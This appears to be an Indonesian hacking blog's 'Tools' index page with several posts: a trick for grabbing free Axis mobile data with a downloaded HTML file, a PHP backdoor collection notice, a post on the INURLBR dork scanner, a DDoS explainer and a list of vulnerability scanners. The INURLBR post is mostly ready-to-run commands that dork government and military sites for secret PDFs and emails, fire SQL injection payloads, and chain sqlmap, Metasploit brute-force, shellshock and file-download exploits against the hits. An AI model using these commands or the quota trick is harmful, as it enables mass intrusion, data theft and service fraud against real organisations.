Tampilkan postingan dengan label Tools. Tampilkan semua postingan
Tampilkan postingan dengan label Tools. Tampilkan semua postingan

Terbaru! Cara Tembak Kuota Axis 500MB

April 09, 2018 0
Axis Tembak 500MB


Halo bro, lama tak jumpa lagi, mimin baru bisa post sekarang kemarin sudah mimin share di Github.
Lagi booming booming nya Tembak Kuota Gratisan kan sekarang? terutama pada provider Axis.

Sekarang mimin mau berbagi bagaimana cara Tembak Axis 500MB.

Simak bro ..

Bahan :
  1. Kartu Axis.
  2. PC atau Android.
Langkah - Langkah :

  1. Download file di Github.
  2. Extrak dan di dalam folder ada file bernama "TEMBAKAXIS.html".
  3. Login ke web my Axis "my.axisnet.id".
  4. Login (jangan di logout).
  5. Terus buka file yang di extrak tadi dengan Browser kamu (file "TEMBAKAXIS.html").
  6. Terus klik menu "TEMBAK".
  7. Cek kuota kamu.
Note : 
  • Trik ini bisa di ulangi sampai mokad.
  • Login ke Dashboard axis lemot karena banyak pemakainya (mohon bersabar).
  • Jika masih bingung silahkan komentar, mimin akan membantu.



Kumpulan Script Backdoor .PHP

Februari 22, 2017 0


Kumpulan dari backdoor PHP. Untuk tujuan pendidikan dan / atau pengujian saja.

Folder deobfuscated tidak selalu berisi versi deobfuscated dari backdoors dapat Anda temukan di folder obfuscated. Untuk deobfuscate mereka dan trik lainnya, Bacalah bagian alat PHP.
 
Selalu menyelidiki malware dalam lingkungan yang aman. Ini berarti: terpisah dari jaringan Anda dan dalam mesin virtual!


Jangan pernah menggunakan ini untuk tujuan jahat.

 

Pengertian Google Dork Tool: INURLBR

Februari 02, 2017 0


INURLBR alat pencarian lanjutan di mesin pencari, memungkinkan analisis yang tersedia untuk mengeksploitasi GET / POST dengan menangkap email & url, dan validasi internal kustom untuk setiap target atau url yang ditemukan.

  [+] AUTOR:        googleINURL
[+] EMAIL: inurlbr@gmail.com
[+] Blog: http://blog.inurl.com.br
[+] Twitter: https://twitter.com/googleinurl
[+] Fanpage: https://fb.com/InurlBrasil
[+] Pastebin http://pastebin.com/u/Googleinurl
[+] GIT: https://github.com/googleinurl
[+] PSS: http://packetstormsecurity.com/user/googleinurl
[+] EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
[+] YOUTUBE: http://youtube.com/c/INURLBrasil
[+] PLUS: http://google.com/+INURLBrasil


  • GROUP INURL BRASIL - ADVANCED SEARCH.
  • SCRIPT NAME: INURLBR
  • Codename: Subversive
  • Version: 2.1.0


Installation

git clone https://github.com/googleinurl/SCANNER-INURLBR.git inurlbr

 

COMMANDS SIMPLE:

./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"  

./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of 
 /wp-content/uploads'

./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' 
 -a 'confidencial'

./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 
 'secreto'        

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1
 ,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'

./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 _TARGET_'

./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli 
 auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/
 passwords E'

./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul
 'python ../sqlmap/ sqlmap.py -u "_TARGETFULL_" --dbs'

./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 
 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u

./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6

./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable)
 AppleWebKit/420+ (KHTML, like Gecko)' 

./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6

./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'

./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_'

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get
 "?´'%270x27;"

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get
 "?pass=1234" -a '<title>hello! 
 admin</title>'

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5

./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_'

./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_'

./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8

./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 --pr

./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --pr --shellshock

./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --sub-file 
 'xpls_Arbitrary_File_Download.txt'  



Tools Hacker DDOS WEB

Februari 02, 2017 0
Security System


Denial of Service (DOS) adalah salah satu serangan paling kuat yang digunakan oleh hacker untuk merugikan perusahaan atau organisasi. Jangan bingung serangan DOS dengan DOS, sistem operasi disk yang dikembangkan oleh Microsoft. Serangan ini adalah salah satu yang paling serangan cyber berbahaya

Hal ini menyebabkan gangguan layanan dan hilangnya jutaan, tergantung pada lamanya serangan. Dalam beberapa tahun terakhir, penggunaan serangan telah meningkat karena ketersediaan alat bantu gratis. Alat ini dapat diblokir dengan mudah dengan memiliki firewall yang bagus. Tapi serangan DOS luas dan cerdas dapat memotong sebagian besar pembatasan.  

Apakah Serangan Denial of Service ?


Sebuah serangan DOS adalah upaya untuk membuat sistem atau server tidak tersedia untuk pengguna yang sah dan, akhirnya, untuk mengambil layanan down. Hal ini dicapai dengan membanjiri permintaan antrian server dengan permintaan palsu. Setelah ini, server tidak akan mampu menangani permintaan dari pengguna yang sah.

Secara umum, ada dua bentuk serangan DOS. Bentuk pertama adalah pada yang dapat menyebabkan crash server. Bentuk kedua dari serangan DOS hanya membanjiri layanan.

Apakah Serangan Distributed Denial of Service ?

 

Ini merupakan versi yang rumit namun ampuh dari serangan DOS yang banyak sistem menyerang terlibat. Dalam serangan DDOS, banyak komputer mulai melakukan serangan DOS pada server target yang sama. Sebagai serangan DOS didistribusikan lebih kelompok besar komputer, diketahui sebagai didistribusikan penolakan serangan layanan.

Untuk melakukan serangan DDOS, penyerang menggunakan jaringan zombie, yang merupakan sekelompok komputer yang terinfeksi di mana penyerang telah diam-diam menginstal DOS alat menyerang. Setiap kali dia ingin melakukan DDOS, ia dapat menggunakan semua komputer jaringan ZOMBIE untuk melakukan serangan.
 

Dengan kata sederhana, ketika sistem server sedang banjir dari permintaan palsu yang berasal dari berbagai sumber (berpotensi ratusan ribu), itu dikenal sebagai serangan DDOS. Dalam hal ini, memblokir alamat IP tunggal atau beberapa tidak bekerja. Semakin anggota di jaringan zombie, lebih kuat serangan itu. Untuk menciptakan jaringan zombie, hacker umumnya menggunakan Trojan.

Pada dasarnya ada tiga jenis serangan DDOS:

  1. Application-layer DDOS attack
  2. Protocol DOS attack
  3. Volume-based DDOS attack

Application-layer DDOS: serangan Aplikasi-lapisan DDOS adalah serangan yang menargetkan Windows, Apache, OpenBSD, atau kerentanan perangkat lunak lain untuk melakukan serangan dan crash server.

Protocol DOS attack: Sebuah serangan DDOS protokol adalah serangan DOS pada tingkat protokol. Kategori ini meliputi Synflood, Ping of Death, dan banyak lagi.

Volume-based DDOS attack: Jenis serangan termasuk ICMP Flood, UDP Flood, dan jenis lain dari flood dilakukan melalui paket palsu.

Ada banyak alat yang tersedia secara gratis yang dapat digunakan untuk membanjiri server dan melakukan serangan. Beberapa alat juga mendukung jaringan zombie untuk melakukan serangan DDOS. Untuk posting ini, kami telah mengumpulkan beberapa alat tersedia secara bebas menyerang DOS.

Tools DDOS Attack


 

Pengertian Tools Vulnerability Scanning

Februari 02, 2017 0
Security

Web Application Vulnerability Scanner adalah alat otomatis yang memindai aplikasi web untuk mencari kelemahan keamanan seperti cross-site scripting, SQL injection, command execution, directory traversal dan konfigurasi server tidak aman. Sejumlah besar kedua alat komersial dan open source yang tersedia dan dan semua alat-alat ini memiliki kekuatan dan kelemahan mereka sendiri. Di sini kami akan memberikan daftar pemindaian kerentanan alat saat ini tersedia di pasaran. Rencananya adalah untuk memperluas daftar ini untuk memberikan informasi tentang masing-masing alat kekuatan dan kelemahan untuk memungkinkan Anda untuk membuat keputusan tentang pemilihan alat khusus untuk memenuhi kebutuhan Anda.

Tools Listing


NameOwnerLicencePlatforms
Acunetix WVSAcunetix Commercial / Free (Limited Capability) Windows
AppScanIBM Commercial Windows
App ScannerTrustwave Commercial Windows
AVDSBeyond Security Commercial / Free (Limited Capability) N/A
BugBlastBuguroo Offensive Security Commercial SaaS or On-Premises
Burp SuitePortSwiger Commercial / Free (Limited Capability) Most platforms supported
ContrastContrast Security Commercial / Free (Limited Capability) SaaS or On-Premises
GamaScanGamaSec Commercial Windows
GrabberRomain Gaucher Open Source Python 2.4, BeautifulSoup and PyXML
Grendel-ScanDavid Byrne Open Source Windows, Linux and Macintosh
GoLismeroGoLismero Team GPLv2.0 Windows, Linux and Macintosh
IKareITrust Commercial N/A
IndusGuard WebIndusface Commercial SaaS
N-StealthN-Stalker Commercial Windows
NetsparkerMavitunaSecurity Commercial Windows
NexposeRapid7 Commercial / Free (Limited Capability) Windows/Linux
NiktoCIRT Open Source Unix/Linux
AppSpiderRapid7 Commercial Windows
ParosProMileSCAN Commercial Windows
Proxy.appWebsecurify Commercial Macintosh
QualysGuardQualys Commercial N/A
RetinaBeyondTrust Commercial Windows
SecurusOrvant, Inc Commercial N/A
SentinelWhiteHat Security Commercial N/A
VegaSubgraph Open Source Windows, Linux and Macintosh
WapitiInformática Gesfor Open Source Windows, Unix/Linux and Macintosh
WebApp360TripWire Commercial Windows
WebInspectHP Commercial Windows
SOATestParasoft Commercial Windows / Linux / Solaris
Trustkeeper ScannerTrustwave SpiderLabs Commercial SaaS
WebReaverWebsecurify Commercial Macintosh
WebScanServiceGerman Web Security Commercial N/A
Websecurify SuiteWebsecurify Commercial / Free (Limited Capability) Windows, Linux, Macintosh
WiktoSensepost Open Source Windows
w3afw3af.org GPLv2.0 Linux and Mac
Xenotix XSS Exploit FrameworkOWASP Open Source Windows
Zed Attack ProxyOWASP Open Source Windows, Unix/Linux and Macintosh